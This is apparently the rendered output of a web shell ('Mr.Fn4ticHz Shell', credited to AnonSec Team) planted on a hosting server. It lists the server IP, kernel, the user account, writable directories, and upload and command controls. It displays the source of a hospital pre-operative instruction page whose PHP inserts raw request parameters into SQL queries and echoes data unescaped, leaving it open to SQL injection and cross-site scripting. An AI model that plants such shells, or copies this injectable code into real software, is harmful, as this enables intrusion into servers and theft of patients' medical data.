Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.129.194.106
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//Preoperative_instruction_sheet.php
<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");
include 'header.php';
include 'dashboarddocument.php';
if(isset($_POST['signup'])) 
{
   PatientManager::admissionpatient("$_POST[patientid]","$_POST[Type_of_Admission]","$_POST[Reason_for_Admission]","$_POST[MLC]","$_POST[MLC_No]");
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
  
  <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
    <form name="signup" method="post" >
                  <p>
          <h3 align="center">Pre-Operative Instruction Sheet</h3>
          <br>

<h2 align="center">Medication Order</h2>
<table id="example2" class="table table-bordered table-hover">
                  <thead>
                  <tr>
                  
    <div class='card-header d-flex p-0'>
                    <ul class='nav nav-pills ml-auto p-2'>
     
         <th><strong>Drug </strong></th>
          <th><strong>Dose in MG</strong></th> 
          <th><strong> Route</strong></th> 
           <th><strong>Frequency </strong></th>
             <th><strong>Duration</strong></th>
                </tr>
                  </thead>
                 
<?php
		$sql ="SELECT * FROM medication WHERE patientid='$_GET[patientid]' AND poa='opdslip' AND prescriptionid='$_GET[prescriptionid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
            echo " <tbody>
                                                                                                                                               
     <tr>   <td>&nbsp;$rs[drug]</td>     
            <td>&nbsp;$rs[dose]</td>
             <td>&nbsp;$rs[Route]</td>
            <td>&nbsp;$rs[Frequency]</td>
		   <td>&nbsp;$rs[duration]</td>	
          </tr>                   
          
          ";
}
?>          </tr>
                  </thead>
                  


                   </tbody>
  <tfoot>
          </tfoot>
        </table>
        <form name="submit" action="anathesiamedicine.php" method="post">
<h2 align="center">Instruction to nursing staff </h2>
<br>
<label>Food Intake</label>
<select name="foodtake">
    <option value="None">None</option>
        <option value="Normal">Normal </option>
            <option value="Liquid">Liquid</option>
                <option value="Nil by mouth">Nil by mouth</option>
</select>
     <label>Anesthesia Note and instruction  </label>
 <textarea id="w3review" name="w3review" rows="2" cols="140">        
   </textarea>
   
   <input type="submit" value="Save & Next" name="submit">
   </form>

Anon7 - 2022
AnonSec Team